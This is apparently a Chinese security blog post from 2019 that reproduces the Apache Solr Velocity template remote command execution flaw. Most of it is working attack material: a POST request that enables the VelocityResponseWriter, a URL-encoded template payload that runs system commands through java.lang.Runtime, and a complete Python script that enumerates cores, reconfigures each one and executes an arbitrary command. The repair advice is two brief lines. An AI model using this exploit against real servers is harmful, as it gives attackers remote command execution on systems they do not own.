apache solr远程命令执行漏洞复现

0x00 前言

Apache Solr 是一个开源的搜索服务器,近日,国外安全研究院s00py爆出了一个apache solr的velocity的一个远程命令执行的0day,截至目前,官方未发布补丁。

0x01 漏洞复现

漏洞poc在s00py已公布,详见https://gist.githubusercontent.com/s00py/a1ba36a3689fa13759ff910e179fc133/raw/fae5e663ffac0e3996fd9dbb89438310719d347a/gistfile1.txt

首先在Core Admin查看应用路径,此处为logadmin

然后访问查看该应用config文件是否可以访问

然后利用s00py公布的poc修改向config发送json配置继续修改

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
POST /solr/test/config HTTP/1.1
Host: solr:8983
Content-Type: application/json
Content-Length: 259

{
"update-queryresponsewriter": {
"startup": "lazy",
"name": "velocity",
"class": "solr.VelocityResponseWriter",
"template.base.dir": "",
"solr.resource.loader.enabled": "true",
"params.resource.loader.enabled": "true"
}
}

修改成功后可利用poc执行任意代码

1
GET /solr/test/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27id%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end

0x03 验证脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
import requests
import json



def get_collection(url):
try:
admin_solr = url + '/solr/admin/cores'
res = requests.get(admin_solr)
#print res.text
colls = []

for key in json.loads(res.text)["status"]:
colls.append(key)
if len(colls) > 0:
print "[+] Get Collection Success For :" +url
return colls
else:
return 0
except:
print "[-] Get Collection Error For : "+url
return -1
def set_config(url,coll):
try:
config_url = url +"/solr/"+coll+"/config"
headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close", "Content-Type": "application/json"}
json={"update-queryresponsewriter": {"class": "solr.VelocityResponseWriter", "name": "velocity", "params.resource.loader.enabled": "true", "solr.resource.loader.enabled": "true", "startup": "lazy", "template.base.dir": ""}}
res = requests.post(config_url, headers=headers, json=json)
if res.status_code == 200:
print "[+] Set Config Success For :" +url+"|"+coll
return 1
else:
print "[-] Set Config Failed For :"+url+"|"+coll
return 0
except:
print "[-] Set Config Error For :"+url+"|"+coll
return -1

def run_cmd(url,coll,cmd="echo boo"):

try:

poc= "/solr/"+coll+"/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27"+cmd+"%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end"
headers = {"Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close"}
res = requests.get(url+poc, headers=headers)
#print "[+] :" +res.text
if 'boo' in res.text:
print "[+] Vuluable : "+url+"|"+coll
else:
print "[+] Not Vuluable : "+url+"|"+coll
except:
print "[+] Run Cmd Error : "+url+"|"+coll

# c = get_collection(url)
if __name__ == '__main__':
url = 'http://zhengbao.wang'
colls = get_collection(url)
if colls:
for coll in colls:
if set_config(url,coll):
run_cmd(url,coll)

0x04 修复建议

  • 对solr增加访问控制
  • 及时关注官方补丁

0x05 参考链接

https://gist.githubusercontent.com/s00py/a1ba36a3689fa13759ff910e179fc133/raw/fae5e663ffac0e3996fd9dbb89438310719d347a/gistfile1.txt

本文标题:apache solr远程命令执行漏洞复现

文章作者:boogle

发布时间:2019年10月31日 - 15:05

最后更新:2019年10月31日 - 15:52

原始链接:http://zhengbao.wang/apache-solr远程命令执行漏洞复现/

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。

感觉写的不错,给买个棒棒糖呗